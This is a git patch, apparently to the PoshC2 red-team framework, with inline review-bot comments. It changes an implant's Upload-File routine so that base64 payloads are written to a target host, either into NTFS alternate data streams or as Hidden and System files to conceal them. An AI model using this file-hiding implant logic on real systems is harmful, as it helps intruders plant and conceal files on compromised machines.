From eee5a50bbcf6d108ca924db7f716b8d23e9703b2 Mon Sep 17 00:00:00 2001
From: m0rv4i
Date: Tue, 12 Mar 2019 08:57:51 +0000
Subject: [PATCH] Tinker with ADS
---
 Modules/Stage2-Core.ps1 | 33 +++++++++++++-------------------
 Tasks.py | 6 ++----
 2 files changed, 15 insertions(+), 24 deletions(-)
diff --git a/Modules/Stage2-Core.ps1 b/Modules/Stage2-Core.ps1
index de59159..894c42a 100644
--- a/Modules/Stage2-Core.ps1
+++ b/Modules/Stage2-Core.ps1
@@ -501,38 +501,31 @@ function Upload-File ) try { $Stream = "" - + $FullPath = $Destination + if ($Destination -Match ':[^\\]'){ + $Destination = $FullPath.Substring(0, $FullPath.LastIndexOf(":")) + $Stream = $FullPath.Substring($FullPath.LastIndexOf(":") + 1) + } + if($Stream){ + $NotHidden = $true + } if ($NotHidden -eq $true) { - write-output "Uploaded file to: $Destination" - $FullPath = $Destination - if ($Destination -Match ':[^\\]'){ - $Destination = $FullPath.Substring(0, $FullPath.LastIndexOf(":")) - $Stream = $FullPath.Substring($FullPath.LastIndexOf(":") + 1) - } $fileBytes = [Convert]::FromBase64String($Base64) if ($Stream){ - add-content -path $Destination -value $fileBytes -stream $Stream -encoding byte + set-content -path $Destination -value $fileBytes -stream $Stream -encoding byte } else { [io.file]::WriteAllBytes($Destination, $fileBytes) } + write-output "Uploaded file to: $FullPath" } else { - write-output "Uploaded file as HIDDEN & SYSTEM to: $Destination" - write-output "Run Get-ChildItem -Force to view the uploaded files" - $FullPath = $Destination - if ($Destination -Match ':[^\\]'){ - $Destination = $FullPath.Substring(0, $FullPath.LastIndexOf(":")) - $Stream = $FullPath.Substring($FullPath.LastIndexOf(":") + 1) - } $fileBytes = [Convert]::FromBase64String($Base64) - if ($Stream){ - add-content -path $Destination -value $fileBytes -stream $Stream -encoding byte - } else { - [io.file]::WriteAllBytes($Destination, $fileBytes) - } + [io.file]::WriteAllBytes($Destination, $fileBytes) + write-output "Uploaded file as HIDDEN & SYSTEM to: $FullPath" $file = Get-Item $Destination -Force $attrib = $file.Attributes $attrib = "Hidden,System" $file.Attributes = $attrib + write-output "Run Get-ChildItem -Force to view the uploaded files" } } catch { diff --git a/Tasks.py b/Tasks.py index 90a1ff9..e263b40 100644 --- a/Tasks.py +++ b/Tasks.py 
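Review bot: The new `if($Stream){ $NotHidden = $true }` block silently overrides the caller's `-NotHidden` choice whenever a stream suffix is parsed, and nothing in the hunk says why; a one-line comment such as `# a stream target is only handled by the set-content path below, so force the non-hidden branch` would keep the next reader from treating it as a bug. In the retained lines of the else branch, `$attrib = $file.Attributes` is overwritten by `$attrib = "Hidden,System"` on the very next line and can be dropped. Upload-File's param block starts before this hunk and its catch block continues after it.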
@@ -2,7 +2,7 @@ from Colours import Colours from Core import load_module, load_module_sharp, encrypt, default_response -import DB, datetime, hashlib +import DB, datetime, hashlib, re def newTask(path): result = DB.get_implants_all() @@ -27,9 +27,7 @@ def newTask(path): user_command = command[0:150]+"......TRUNCATED......"+command[-80:] elif (command.lower().startswith('upload-file')): filepath = command.replace('upload-file', '') - if ":" in filepath: - filepath = filepath.split(":")[0].strip() - elif ";" in filepath: + if ";" in filepath: filepath = filepath.split(";")[1].strip() elif "estination" in filepath: filepath = filepath.split('"')[1].strip()
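Review bot: `re` is added to the import line in the first hunk but is not used in either hunk of Tasks.py shown here; if no other part of the file uses it, the import is dead and should be dropped, and if it is used, the commit should include that use so the addition is traceable. The line also keeps several modules on one `import` statement, which PEP 8 discourages; one module per line (`import DB`, `import datetime`, ...) would make future diffs to this spot smaller. newTask's body continues beyond both hunks.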